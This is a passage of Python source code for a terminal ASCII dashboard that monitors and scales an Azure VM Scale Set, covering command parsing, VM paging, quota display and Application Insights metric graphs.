len(cmd.split()) != 3):\n\t\treturn syntaxerror;\n\n\tcounter = 0;\n\tfor c in cmd.split():\n\t\tif (counter == 0):\n\t\t\tif (c == \"add\" or c == \"del\" or c == \"rg\" or c == \"select\" or c == \"show\"):\n\t\t\t\top = c;\n\t\t\telse:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and op == \"show\" and c != \"page\"):\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and c != \"vm\") and (op == \"add\" or op == \"del\" or op == \"select\"):\n\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and op == \"rg\"):\n\t\t\trgname_new = c;\n\t\tif (counter == 2) and (op == \"add\" or op == \"del\" or op == \"select\" or op == \"show\"): \n\t\t\ttry:\n\t\t\t\ta = int(c) + 1;\n\t\t\t\tqtd = int(c);\n\t\t\texcept:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 2 and op == \"select\"):\n\t\t\tz = 0; ifound = 0;\n\t\t\twhile (z < instances_deployed.__len__()):\n\t\t\t\tif (instances_deployed[z] == int(c)):\n\t\t\t\t\tifound = 1;\n\t\t\t\t\tbreak;\n\t\t\t\tz += 1;\n\t\t\tif (ifound):\n\t\t\t\tvm = int(c);\n\t\t\telse:\n\t\t\t\treturn execerror;\n\t\tif (counter == 2 and op == \"rg\" and c != \"vmss\"):\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 2 and op == \"show\"):\n\t\t\ttry:\n\t\t\t\ta = int(c) + 1;\n\t\t\t\tif (int(c) == page):\n\t\t\t\t\treturn execsuccess; \n\t\t\t\tif (int(c) > 1):\n\t\t\t\t\tb = ((window_vm.__len__() / (int(c) - 1)));\n\t\t\t\t\tif (b <= 100 or (int(c)) <= 0):\n\t\t\t\t\t\treturn syntaxerror;\n\t\t\t\t\telse:\n\t\t\t\t\t\tpage_new = int(c);\n\t\t\t\telif (int(c) == 1):\n\t\t\t\t\t\tpage_new = int(c);\n\t\t\t\telse:\n\t\t\t\t\t\treturn syntaxerror;\n\t\t\texcept:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 3 and op == \"rg\"):\n\t\t\tvmssname_new = c;\n\t\tcounter += 1;\n\n\t#Execution...\n\tif (op == \"add\" or op == \"del\"):\n\t\tif (qtd > 99): \n\t\t\treturn capacityerror;\n\t\t#Scale-in or Scale-out...\n\t\tif (op == \"add\"):\n \t\t\tnewCapacity = cap + int(c);\n\t\telse:\n \t\t\tnewCapacity = cap - int(c);\n\t\t#Ok, everything seems fine, let's do it...\n\t\t#Change the VM scale set capacity by 'qtd' (can be positive or negative for scale-out/in)\n\t\t#The interface for scale_vmss changed from 7 to just 5 arguments...\n\t\t#scaleoutput = azurerm.scale_vmss(access_token, subscription_id, rgname, vmssname, vmsku, tier, newCapacity);\n\t\tscaleoutput = azurerm.scale_vmss(access_token, subscription_id, rgname, vmssname, newCapacity);\n\t\tif (scaleoutput.status_code == 200):\n\t\t\treturn execsuccess;\n\t\telse:\n\t\t\treturn execerror;\n\telif (op == \"select\"):\n\t\tvm_selected[1] = vm_selected[0];\n\t\tvm_selected[0] = vm;\n\t\tvm_details_old = vm_details; vm_nic_old = vm_nic;\n\t\tvm_details = azurerm.get_vmss_vm_instance_view(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t#vm_nic = azurerm.get_vmss_vm_nics(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t#if (len(vm_details) > 0 and len(vm_nic) > 0):\n\t\tif (len(vm_details) > 0):\n\t\t\treturn execsuccess;\n\t\telse:\n\t\t\tvm_details = vm_details_old;\n\t\t\tvm_nic = vm_nic_old;\n\t\t\tvm_selected[1] = 999998;\n\t\t\treturn execerror;\n\telif (op == \"show\"):\n\t\tunset_page();\n\t\tset_page(window, page_new);\n\t\treturn execsuccess;\n\telse:\n\t\t#Test to be sure the resource group and vmss provided do exist...\n\t\trgoutput = azurerm.get_vmss(access_token, subscription_id, rgname_new, vmssname_new);\n\t\ttry:\n\t\t\ttest = rgoutput['location'];\n\t\t\trgname = rgname_new; vmssname = vmssname_new;\n\t\t\t#Just a flag for us to know that we changed the vmss and need to deselect any VM...\n\t\t\tvm_selected[1] = 999998;\n\t\t\t#We need to clear the Insights graph too...\n\t\t\tinsights_flag = 1;\n\t\t\tpage = 1;\n\t\t\treturn execsuccess;\n\t\texcept:\n\t\t\treturn execerror;\n\ndef unset_page():\n\tglobal page, window_vm, panel_vm;\n\told_page = page;\n\n\tvmlimit = int(window_vm.__len__());\n\tblimit = int(int(old_page) * 100);\n\tb = (blimit - 100);\n\twhile (b < blimit and b < vmlimit):\n\t\thide_panel(panel_vm[b]);\n\t\tb += 1;\n\ndef set_page(window, page_new):\n\tglobal page, window_vm, panel_vm;\n\tpage = page_new;\n\tsnap_page = \"%02d\" % page_new;\n\n\tvmlimit = int(window_vm.__len__());\n\tblimit = int(int(page) * 100);\n\tb = (blimit - 100);\n\twhile (b < blimit and b < vmlimit):\n\t\tshow_panel(panel_vm[b]);\n\t\tb += 1;\n\twrite_str(window['virtualmachines'], 31, 45, snap_page);\n\tupdate_panels();\n\tdoupdate();\n\ndef fill_quota_info(window, quota):\n\twrite_str(window['usage'], 2, 23, quota['value'][0]['currentValue']);\n\twrite_str_color(window['usage'], 2, 29, quota['value'][0]['limit'], 7, 0);\n\tdraw_gauge(window['gaugeas'], quota['value'][0]['currentValue'], quota['value'][0]['limit']);\n\n\twrite_str(window['usage'], 3, 23, quota['value'][1]['currentValue']);\n\twrite_str_color(window['usage'], 3, 29, quota['value'][1]['limit'], 7, 0);\n\tdraw_gauge(window['gaugerc'], quota['value'][1]['currentValue'], quota['value'][1]['limit']);\n\n\twrite_str(window['usage'], 4, 23, quota['value'][2]['currentValue']);\n\twrite_str_color(window['usage'], 4, 29, quota['value'][2]['limit'], 7, 0);\n\tdraw_gauge(window['gaugevm'], quota['value'][2]['currentValue'], quota['value'][2]['limit']);\n\n\twrite_str(window['usage'], 5, 23, quota['value'][3]['currentValue']);\n\twrite_str_color(window['usage'], 5, 29, quota['value'][3]['limit'], 7, 0);\n\tdraw_gauge(window['gaugess'], quota['value'][3]['currentValue'], quota['value'][3]['limit']);\n\ndef fill_vmss_info(window, vmssget, net):\n\t(name, capacity, location, offer, sku, provisioningState, dns, ipaddr) = set_vmss_variables(vmssget, net);\n\n\twrite_str(window['vmss_info'], 2, 14, rgname.upper());\n\twrite_str(window['vmss_info'], 2, 48, vmssname.upper());\n\twrite_str(window['vmss_info'], 2, 76, tier.upper());\n\twrite_str(window['vmss_info'], 3, 37, location.upper());\n\twrite_str(window['vmss_info'], 3, 76, vmsku);\n\twrite_str(window['vmss_info'], 4, 79, capacity);\n\n\t#Sys info...\n\twrite_str(window['system'], 1, 22, offer);\n\twrite_str(window['system'], 2, 22, sku);\n\tcor=6;\n\tif (provisioningState == \"Updating\"): cor=7;\n\twrite_str_color(window['system'], 4, 22, provisioningState, cor, 0);\n\twrite_str(window['vmss_info'], 4, 14, dns);\n\twrite_str(window['vmss_info'], 3, 14, ipaddr);\n\ndef update_vm_footer(window, cur_page, tot_pages):\n\twrite_str(window['virtualmachines'], 31, 38, \" Page: \");\n\twrite_str(window['virtualmachines'], 31, 45, cur_page);\n\twrite_str(window['virtualmachines'], 31, 47, \"/\");\n\twrite_str(window['virtualmachines'], 31, 48, tot_pages);\n\twrite_str(window['virtualmachines'], 31, 50, \" \");\n\ndef fill_vm_details(window, instanceId, vmName, provisioningState):\n\tglobal vm_details; \n\twrite_str(window['vm'], 2, 17, instanceId);\n\twrite_str(window['vm'], 3, 17, vmName);\n\tcor=7;\n\tif (provisioningState == \"Succeeded\"): cor=6;\n\twrite_str_color(window['vm'], 4, 17, provisioningState, cor, 0);\n\tif (provisioningState == \"Succeeded\"):\n\t\tcdate = vm_details['statuses'][0]['time'];\n\t\tvmdate = cdate.split(\"T\")\n\t\tvmtime = vmdate[1].split(\".\")\n\t\twrite_str(window['vm'], 5, 17, vmdate[0]);\n\t\twrite_str(window['vm'], 6, 17, vmtime[0]);\n\t\tcor=7;\n\t\tif (vm_details['statuses'][1]['displayStatus'] == \"VM running\"): cor=6;\n\t\twrite_str_color(window['vm'], 7, 17, vm_details['statuses'][1]['displayStatus'], cor, 0);\n\t\twrite_str(window['vm'], 8, 17, vm_details['platformUpdateDomain']);\n\t\twrite_str(window['vm'], 9, 17, vm_details['platformFaultDomain']);\n\t\twrite_str(window['vm'], 11, 12, vm_nic['value'][0]['name']);\n\t\twrite_str(window['vm'], 12, 12, vm_nic['value'][0]['properties']['macAddress']);\n\t\twrite_str(window['vm'], 13, 12, vm_nic['value'][0]['properties']['ipConfigurations'][0]['properties']['privateIPAddress']);\n\t\twrite_str(window['vm'], 14, 12, vm_nic['value'][0]['properties']['ipConfigurations'][0]['properties']['primary']);\n\t\tif (vm_details['vmAgent']['statuses'][0]['message'] == \"Guest Agent is running\"): \n\t\t\tcor=6;\n\t\t\tagentstatus = \"Agent is running\";\n\t\telif (vm_details['vmAgent']['statuses'][0]['message'] == \"VM Agent is unresponsive.\"):\n\t\t\tcor=7;\n\t\t\tagentstatus = \"Agent is unresponsive\";\n\t\telse:\n\t\t\tcor=7;\n\t\t\tagentstatus = vm_details['vmAgent']['statuses'][0]['message'];\n\t\twrite_str(window['vm'], 16, 11, vm_details['vmAgent']['vmAgentVersion']);\n\t\twrite_str(window['vm'], 17, 11, vm_details['vmAgent']['statuses'][0]['displayStatus']);\n\t\twrite_str_color(window['vm'], 18, 11, agentstatus, cor, 0);\n\ndef deselect_vm(window, panel, instanceId, counter):\n\tglobal vm_selected;\n\n\tvmsel = 0;\n\tif (vm_selected[1] == int(instanceId) and vm_selected[1] != vm_selected[0]):\n\t\tbox(window[int(counter - 1)]);\n\tif (vm_selected[0] == int(instanceId) and vm_selected[1] != 999998 and vm_selected[0] != vm_selected[1]):\n\t\tvmsel = 1;\n\t\tshow_panel(panel['vm']);\n\tif (vm_selected[0] == int(instanceId) and vm_selected[1] == 999998):\n\t\tvmsel = 0;\n\t\tvm_selected = [999999, 999999];\n\treturn (vmsel);\n\ndef set_vmss_variables(vmssget, net):\n\tglobal vmsku, tier;\n\n\tname = vmssget['name']\n\tcapacity = vmssget['sku']['capacity']\n\tlocation = vmssget['location'];\n\ttier = vmssget['sku']['tier']\n\tvmsku = vmssget['sku']['name']\n\toffer = vmssget['properties']['virtualMachineProfile']['storageProfile']['imageReference']['offer']\n\tsku = vmssget['properties']['virtualMachineProfile']['storageProfile']['imageReference']['sku']\n\tprovisioningState = vmssget['properties']['provisioningState']\n\tdns = net['value'][0]['properties']['dnsSettings']['fqdn'];\n\tipaddr = net['value'][0]['properties']['ipAddress'];\n\treturn (name, capacity, location, offer, sku, provisioningState, dns, ipaddr);\n\n\n# thread to loop around monitoring the VM Scale Set state and its VMs\n# sleep between loops sets the update frequency\ndef get_vmss_properties(access_token, run_event, window_information, panel_information, window_continents, panel_continents):\n\tglobal vmssProperties, vmssVmProperties, countery, capacity, region, tier, vmsku, vm_selected, window_vm, panel_vm, instances_deployed, vm_details, vm_nic, page;\n\n\tROOM = 5; DEPLOYED = 0;\n\n\t#VM's destination...\n\tdestx = 22; desty = 4; XS =50; YS = 4; init_coords = (XS, YS);\n\twindow_dc = 0;\n\n\t#Our window_information arrays...\n\tpanel_vm = []; window_vm = [];\n\n\t#Our thread loop...\n\twhile run_event.is_set():\n\t\ttry:\n\t\t\t#Timestamp...\n\t\t\tourtime = time.strftime(\"%H:%M:%S\");\n\t\t\twrite_str(window_information['status'], 1, 13, ourtime);\n\n\t\t\t#Clean Forms...\n\t\t\tclean_forms(window_information);\n\n\t\t\t#Get VMSS details\n\t\t\tvmssget = azurerm.get_vmss(access_token, subscription_id, rgname, vmssname);\n\n\t\t\t# Get public ip address for RG (First IP) - modify this if your RG has multiple ips\n\t\t\tnet = azurerm.list_public_ips(access_token, subscription_id, rgname);\n\n\t\t\t#Clean Info and Sys Windows...\n\t\t\tclean_infoandsys(window_information);\n\n\t\t\t#Fill the information...\n\t\t\tfill_vmss_info(window_information, vmssget, net);\n\n\t\t\t#Set VMSS variables...\n\t\t\t(name, capacity, location, offer, sku, provisioningState, dns, ipaddr) = set_vmss_variables(vmssget, net);\n\n\t\t\t#Set the current and old location...\n\t\t\told_location = region;\n\t\t\tif (old_location != \"\"):\n\t\t\t\tcontinent_old_location = get_continent_dc(old_location);\n\n\t\t\t#New\n\t\t\tregion = location;\n\t\t\tcontinent_location = get_continent_dc(location);\n\n\t\t\t#Quota...\n\t\t\tquota = azurerm.get_compute_usage(access_token, subscription_id, location);\n\t\t\tfill_quota_info(window_information, quota);\n\n\t\t\t#Mark Datacenter where VMSS is deployed...\n\t\t\tif (old_location != \"\"):\n\t\t\t\tif (old_location != location):\n\t\t\t\t\t#Now switch the datacenter mark on map...\n\t\t\t\t\tnew_window_dc = mark_vmss_dc(continent_old_location, window_continents[continent_old_location], old_location, window_continents[continent_location], location, window_dc);\n\t\t\t\t\twindow_dc = new_window_dc;\n\t\t\telse:\n\t\t\t\tnew_window_dc = mark_vmss_dc(continent_location, window_continents[continent_location], location, window_continents[continent_location], location, window_dc);\n\t\t\t\twindow_dc = new_window_dc;\n\n\t\t\t#Our arrays...\n\t\t\tvmssProperties = [name, capacity, location, rgname, offer, sku, provisioningState, dns, ipaddr];\n\t\t\tvmssvms = azurerm.list_vmss_vms(access_token, subscription_id, rgname, vmssname);\n\t\t\tvmssVmProperties = [];\n\n\t\t\t#All VMs are created in the following coordinates...\n\t\t\tqtd = vmssvms['value'].__len__();\n\t\t\tfactor = (vmssvms['value'].__len__() / 100);\n\n\t\t\twrite_str(window_information['system'], 3, 22, qtd);\n\n\t\t\tstep = qtd / 10;\n\t\t\tif (step < 1): step = 1;\t\n\n\t\t\t#We take more time on our VM effects depending on how many VMs we are talking about...\n\t\t\tif (qtd < 10): ts = 0.01;\n\t\t\telif (qtd < 25): ts = 0.004;\n\t\t\telif (qtd < 50): ts = 0.0008;\n\t\t\telif (qtd < 100): ts = 0.0004;\n\t\t\telse: ts = 0;\n\n\t\t\tcounter = 1; counter_page = 0; nr_pages = 1;\n\n\t\t\tsnap_page = page;\n\t\t\tpage_top = (snap_page * 100);\n\t\t\tpage_base = ((snap_page - 1) * 100);\n\n\t\t\tif (vm_selected[1] == 999998):\n\t\t\t\t#Clean VM Info...\n\t\t\t\tclean_vm(window_information);\n\t\t\t#Loop each VM...\n\t\t\tfor vm in vmssvms['value']:\n\t\t\t\tinstanceId = vm['instanceId'];\n\t\t\t\twrite_str(window_information['monitor'], 1, 30, instanceId);\n\t\t\t\twrefresh(window_information['monitor']);\n\t\t\t\tvmsel = 0;\n\t\t\t\tvmName = vm['name'];\n\t\t\t\tprovisioningState = vm['properties']['provisioningState'];\n\t\t\t\tvmssVmProperties.append([instanceId, vmName, provisioningState]);\n\t\t\t\tif (counter > DEPLOYED):\n\t\t\t\t\twindow_vm.append(DEPLOYED); panel_vm.append(DEPLOYED); instances_deployed.append(DEPLOYED);\n\t\t\t\t\tinstances_deployed[DEPLOYED] = int(instanceId);\n\t\t\t\t\t#Prepare the place for the VM icon...\n\t\t\t\t\tif countery < 10:\n\t\t\t\t\t\tcountery += 1;\n\t\t\t\t\telse:\n\t\t\t\t\t\tdestx += 3; desty = 4; countery = 1;\n\t\t\t\t\tif (counter_page > 99):\n\t\t\t\t\t\tdestx = 22; counter_page = 0; nr_pages += 1;\n\t\t\t\t\t\tcur_page = \"%02d\" % snap_page;\n\t\t\t\t\t\ttot_pages = \"%02d\" % nr_pages;\n\t\t\t\t\t\tupdate_vm_footer(window_information, cur_page, tot_pages);\n\t\t\t\t\telse:\n\t\t\t\t\t\tcounter_page += 1;\n\t\t\t\t\twindow_vm[DEPLOYED] = create_window(3, 5, init_coords[0], init_coords[1]);\n\t\t\t\t\tpanel_vm[DEPLOYED] = new_panel(window_vm[DEPLOYED]);\n\t\t\t\t\t#Show only VM's that are on the visible window...\n\t\t\t\t\tif (page_top > DEPLOYED and DEPLOYED >= page_base):\n\t\t\t\t\t\tshow_panel(panel_vm[DEPLOYED]);\n\t\t\t\t\telse:\n\t\t\t\t\t\thide_panel(panel_vm[DEPLOYED]);\n\t\t\t\t\tbox(window_vm[DEPLOYED]);\n\t\t\t\t\t#Creation of the VM icon, in this flow we never have a VM selected...\n\t\t\t\t\tdraw_vm(int(instanceId), window_vm[DEPLOYED], provisioningState, vmsel);\n\t\t\t\t\tvm_animation(panel_vm[DEPLOYED], init_coords, destx, desty, 1, ts);\n\t\t\t\t\tdesty += ROOM;\n\t\t\t\t\tDEPLOYED += 1;\n\t\t\t\telse:\n\t\t\t\t\tinstances_deployed[counter - 1] = int(instanceId);\n\t\t\t\t\t#Remove the old mark...\n\t\t\t\t\tvmsel = deselect_vm(window_vm, panel_information, instanceId, counter);\n\t\t\t\t\t#Show only VM's that are on the visible window...\n\t\t\t\t\tif (page_top > (counter - 1) and (counter - 1) >= page_base):\n\t\t\t\t\t\tshow_panel(panel_vm[counter -1]);\n\t\t\t\t\telse:\n\t\t\t\t\t\thide_panel(panel_vm[counter -1]);\n\t\t\t\t\t#Creation of the VM icon...\n\t\t\t\t\tdraw_vm(int(instanceId), window_vm[counter - 1], provisioningState, vmsel);\n\t\t\t\t\t#If a VM is selected, fill the details...\n\t\t\t\t\tif (vm_selected[0] == int(instanceId) and vm_selected[1] != 999998):\n\t\t\t\t\t\tvm_details = azurerm.get_vmss_vm_instance_view(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t\t\t\t\tvm_nic = azurerm.get_vmss_vm_nics(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t\t\t\t\tclean_vm(window_information);\n\t\t\t\t\t\tif (vm_details != \"\" and vm_nic != \"\"):\n\t\t\t\t\t\t\tfill_vm_details(window_information, instanceId, vmName, provisioningState);\n\t\t\t\tupdate_panels();\n\t\t\t\tdoupdate();\n\t\t\t\tcounter += 1;\n\t\t\t\tdo_update_bar(window_information['status'], step, 0);\n\t\t\t\tstep += step;\n\t\t\t#Last mile...\n\t\t\twrite_str(window_information['monitor'], 1, 30, \"Done.\");\n\t\t\tdo_update_bar(window_information['status'], step, 1);\n\n\t\t\t#Remove destroyed VMs...\n\t\t\tcounter_page = 0;\n\t\t\tif (DEPLOYED >= counter):\n\t\t\t\ttime.sleep(0.5);\n\t\t\t\twrite_str_color(window_information['monitor'], 1, 30, \"Removing VM's...\", 7, 0);\n\t\t\t\twrefresh(window_information['monitor']);\n\t\t\t\ttime.sleep(1);\n\t\t\t\tclean_monitor_form(window_information);\n\t\n\t\t\twhile (DEPLOYED >= counter):\n\t\t\t\twrite_str(window_information['monitor'], 1, 30, DEPLOYED);\n\t\t\t\tlastvm = window_vm.__len__() - 1;\t\n\t\t\t\tvm_coords = getbegyx(window_vm[lastvm]);\n\t\t\t\tvm_animation(panel_vm[lastvm], vm_coords, init_coords[0], init_coords[1], 0, ts);\n\t\t\t\tif (countery > 0):\n\t\t\t\t\tdesty -= ROOM; countery -= 1;\n\t\t\t\telif (destx > 22):\n\t\t\t\t\tdestx -= 3; desty = 49; countery = 9;\n\t\t\t\tif (counter_page > 99):\n\t\t\t\t\tdestx = 52;\n\t\t\t\t\tcounter_page = 0;\n\t\t\t\t\tnr_pages -= 1;\n\t\t\t\t\ttot_pages = \"%02d\" % nr_pages;\n\t\t\t\t\tcur_page = \"%02d\" % page;\n\t\t\t\t\tupdate_vm_footer(window_information, cur_page, tot_pages);\n\t\t\t\telse:\n\t\t\t\t\tcounter_page += 1;\n\t\t\t\t\n\t\t\t\t#Clean VM Info...\n\t\t\t\tif (vm_selected[0] == instances_deployed[lastvm]):\n\t\t\t\t\tclean_vm(window_information);\n\t\t\t\t#Free up some memory...\n\t\t\t\tdel_panel(panel_vm[lastvm]); delwin(window_vm[lastvm]);\n\t\t\t\twobj = panel_vm[lastvm]; panel_vm.remove(wobj);\n\t\t\t\twobj = window_vm[lastvm]; window_vm.remove(wobj);\n\t\t\t\twobj = instances_deployed[lastvm]; instances_deployed.remove(wobj);\n\t\t\t\tDEPLOYED -= 1;\n\t\t\t\tupdate_panels();\n\t\t\t\tdoupdate();\n\t\t\twrite_str(window_information['monitor'], 1, 30, \"Done.\");\n\t\t\tourtime = time.strftime(\"%H:%M:%S\");\n\t\t\tdo_update_bar(window_information['status'], step, 1);\n\t\t\twrite_str(window_information['status'], 1, 13, ourtime);\n\t\t\twrite_str_color(window_information['status'], 1, 22, \" OK \", 6, 0);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\t\t\t# sleep before each loop to avoid throttling...\n\t\t\ttime.sleep(interval);\n\t\texcept:\n\t\t\tlogging.exception(\"Getting VMSS Information...\")\n\t\t\twrite_str(window_information['error'], 1, 24, \"Let's sleep for 30 seconds and try to refresh the dashboard again...\");\n\t\t\tshow_panel(panel_information['error']);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\t\t\t## break out of loop when an error is encountered\n\t\t\t#break\n\t\t\ttime.sleep(30);\n\t\t\thide_panel(panel_information['error']);\n\ndef get_cmd(access_token, run_event, window_information, panel_information):\n\tglobal key, rgname, vmssname, vm_selected, quit;\n\t\n\twin_help = 0; win_log = 0; win_insightsone = 0; win_insightstwo = 0;\n\tlock = threading.Lock()\n\twhile (run_event.is_set() and quit == 0):\n\t\twith lock:\n\t\t\tkey = getch();\n\t\tif (key == 58):\n\t\t\tcurs_set(True);\n\t\t\techo();\n\t\t\t#Clear the old command from our prompt line...\n\t\t\twmove(window_information['cmd'], 1, 5); wclrtoeol(window_information['cmd']);\n\t\t\tcreate_prompt_form(window_information['cmd']);\n\n\t\t\t#Home...\n\t\t\tourhome = platform.system();\n\n\t\t\t#Read the command...\n\t\t\tinputcommand = mvwgetstr(window_information['cmd'], 1, 5);\n\t\t\tif (ourhome == 'Windows'):\n\t\t\t\tcommand = inputcommand;\n\t\t\telse:\n\t\t\t\tcommand = inputcommand.decode('utf-8');\n\n\t\t\tcurs_set(False);\n\t\t\tnoecho();\n\t\t\tcreate_prompt_form(window_information['cmd']);\n\n\t\t\tcor=6;\n\t\t\tif (command == \"help\"):\n\t\t\t\tif (win_help):\n\t\t\t\t\thide_panel(panel_information['help']);\n\t\t\t\t\twin_help = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['help']);\n\t\t\t\t\twin_help = 1;\n\t\t\telif (command == \"debug\"):\n\t\t\t\tif (win_log and win_insightsone and win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['log']);\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_log = 0; win_insightsone = 0; win_insightstwo = 0; \n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['log']);\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_log = 1; win_insightsone = 1; win_insightstwo = 1;\n\t\t\telif (command == \"log\"):\n\t\t\t\tif (win_log):\n\t\t\t\t\thide_panel(panel_information['log']);\n\t\t\t\t\twin_log = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['log']);\n\t\t\t\t\twin_log = 1;\n\t\t\telif (command == \"insights\"):\n\t\t\t\tif (win_insightsone and win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightsone = 0; win_insightstwo = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightsone = 1; win_insightstwo = 1;\n\t\t\telif (command == \"insights 1\"):\n\t\t\t\tif (win_insightsone):\n\t\t\t\t\thide_panel(panel_information['insightsone']);\n\t\t\t\t\twin_insightsone = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightsone']);\n\t\t\t\t\twin_insightsone = 1;\n\t\t\telif (command == \"insights 2\"):\n\t\t\t\tif (win_insightstwo):\n\t\t\t\t\thide_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightstwo = 0;\n\t\t\t\telse:\n\t\t\t\t\tshow_panel(panel_information['insightstwo']);\n\t\t\t\t\twin_insightstwo = 1;\n\t\t\telif (command == \"quit\" or command == 'exit'):\n\t\t\t\tquit = 1;\n\t\t\telif (command == \"deselect\"):\n\t\t\t\tvm_selected[1] = 999998;\n\t\t\t\thide_panel(panel_information['vm']);\n\t\t\telse:\n\t\t\t\tcmd_status = exec_cmd(window_information, access_token, capacity, command);\n\t\t\t\tif (cmd_status == 1): cor = 8;\n\t\t\t\tif (cmd_status == 2): cor = 4;\n\t\t\t\tif (cmd_status == 3): cor = 7;\n\t\t\t\tif (cmd_status == 4): cor = 3;\n\t\t\twrite_str_color(window_information['cmd'], 1, 125, \"E\", cor, 1);\n\t\t\tupdate_panels();\n\t\t\tdoupdate();\n\ndef insights_in_window(log, window, run_event):\n\tglobal insights_flag, insightsOneUrl, insightsTwoUrl;\n\n\tlock = threading.Lock()\n\n\ttotal_values_one = 87; total_values_two = 71;\n\t#x, y = getmaxyx(window['insightsone']);\n\t#a, b = getmaxyx(window['insightstwo']);\n\tvalues_insightsone = []; values_insightstwo = [];\n\tindex_one = 0; index_two = 0;\n\n\twhile (run_event.is_set() and quit == 0):\n\t\t#Clean the graph area...\n\t\tflag = 0;\n\t\t#If the user changed the RG and VMSS we need to set the 'flag' before calling the graph routine...\n\t\tif (insights_flag): \n\t\t\tflag = 1;\n\t\t\tinsights_flag = 0;\n\t\t\tvalues_insightsone = []; values_insightstwo = [];\n\t\t\tindex_one = 0; index_two = 0;\n\n\t\t#Get the Insights metrics and draw graph...\n\t\tcustomheader = {'X-Api-Key': insightsKey}\n\t\tif (insightsOneEnabled.lower() == \"yes\"):\n\t\t\tclean_insights(window['insightsone'], 10);\n\t\t\t#Open space to a new sample...\n\t\t\tvalues_insightsone.append(index_one);\n\t\t\ttry:\n\t\t\t\tif (insightsOneUrl == \"\"):\n\t\t\t\t\tinsightsOneUrl = insightsUrl + insightsAppId + \"/metrics/\" + insightsOneMetric + \"?timespan=PT\" + str(insightsInterval) + \"S\";\n\n\t\t\t\tmetricone = requests.get(insightsOneUrl, headers=customheader);\n\t\t\t\tmetriconevalue = metricone.json();\n\t\t\t\tif (metriconevalue['value'][insightsOneMetric].values()[-1] is not None):\n\t\t\t\t\tvalues_insightsone[index_one] = int(metriconevalue['value'][insightsOneMetric].values()[-1]);\n\t\t\t\telse:\n\t\t\t\t\tvalues_insightsone[index_one] = 0;\n\t\t\t\tlogging.info(\"INSIGHTS %s: %s\", insightsOneTitle, values_insightsone[index_one]);\n\t\t\t\tif (index_one == total_values_one):\n\t\t\t\t\tvalues_insightsone.pop(0);\n\t\t\t\t\tindex_one = (total_values_one - 1);\n\t\t\t\tindex_one += 1;\n\t\t\t\tdraw_insights(window['insightsone'], values_insightsone, insightsOneTitle, \"One\", flag);\n\t\t\texcept:\n\t\t\t\tlogging.exception(\"Getting Insights Metric: %s\", insightsOneTitle);\n\n\t\tif (insightsTwoEnabled.lower() == \"yes\"):\n\t\t\tclean_insights(window['insightstwo'], 7);\n\t\t\t#Open space to a new sample...\n\t\t\tvalues_insightstwo.append(index_two);\n\t\t\ttry:\n\t\t\t\tif (insightsTwoUrl == \"\"):\n\t\t\t\t\tinsightsTwoUrl = insightsUrl + insightsAppId + \"/metrics/\" + insightsTwoMetric + \"?timespan=PT\" + str(insightsInterval) + \"S\";\n\n\t\t\t\tmetrictwo = requests.get(insightsTwoUrl, headers=customheader);\n\t\t\t\tmetrictwovalue = metrictwo.json();\n\t\t\t\tif (metrictwovalue['value'][insightsTwoMetric].values()[-1] is not None):\n\t\t\t\t\tvalues_insightstwo[index_two] = int(metrictwovalue['value'][insightsTwoMetric].values()[-1]);\n\t\t\t\telse:\n\t\t\t\t\tvalues_insightstwo[index_two] = 0;\n\t\t\t\tlogging.info(\"INSIGHTS %s: %s\", insightsTwoTitle, values_insightstwo[index_two]);\n\t\t\t\tif (index_two == total_values_two):\n\t\t\t\t\tvalues_insightstwo.pop(0);\n\t\t\t\t\tindex_two = (total_values_two - 1);\n\t\t\t\tindex_two += 1;\n\t\t\t\tdraw_insights(window['insightstwo'], values_insightstwo, insightsTwoTitle, \"Two\", flag);\n\t\t\texcept:\n\t\t\t\tlogging.exception(\"Getting Insights Metric: %s\", insightsTwoTitle);\n\n\t\t#Sleep a little...\n\t\tupdate_panels();\n\t\tdoupdate();\n\t\ttime.sleep(insightsInterval);\n\ndef vmss_monitor_thread(window_information, panel_information, window_continents, panel_continents):\n\tglobal access_token, insightsOneEnabled, insightsTwoEnabled;\n\n\trun_event = threading.Event()\n\trun_event.set()\n\n\t# start a timer in order to refresh the access token in 10 minutes\n\tstart_time = time.time();\n\n\t# get an access token for Azure authentication\n\taccess_token = azurerm.get_access_token(str(tenant_id), str(app_id), str(app_secret));\n\n\t# ---= ASCii Dashboard THREADS =---\n\t# Logtail Thread...\n\tlog_thread = threading.Thread(target=tail_in_window, args=(logName, window_information['log'], panel_information['log'], run_event))\n\tlog_thread.start()\n\n\t# VMSS Monitoring Thread...\n\tvmss_thread = threading.Thread(target=get_vmss_properties, args=(access_token, run_event, window_information, panel_information, window_continents, panel_continents))\n\tvmss_thread.start()\n\n\t# start a CMD Interpreter thread\n\tcmd_thread = threading.Thread(target=get_cmd, args=(access_token, run_event, window_information, panel_information))\n\tcmd_thread.start()\n\n\t#Simple consistent check for the Insights configuration...\n\tif (insightsOneEnabled.lower() == \"yes\"):\n\t\tif ((insightsOneUrl == 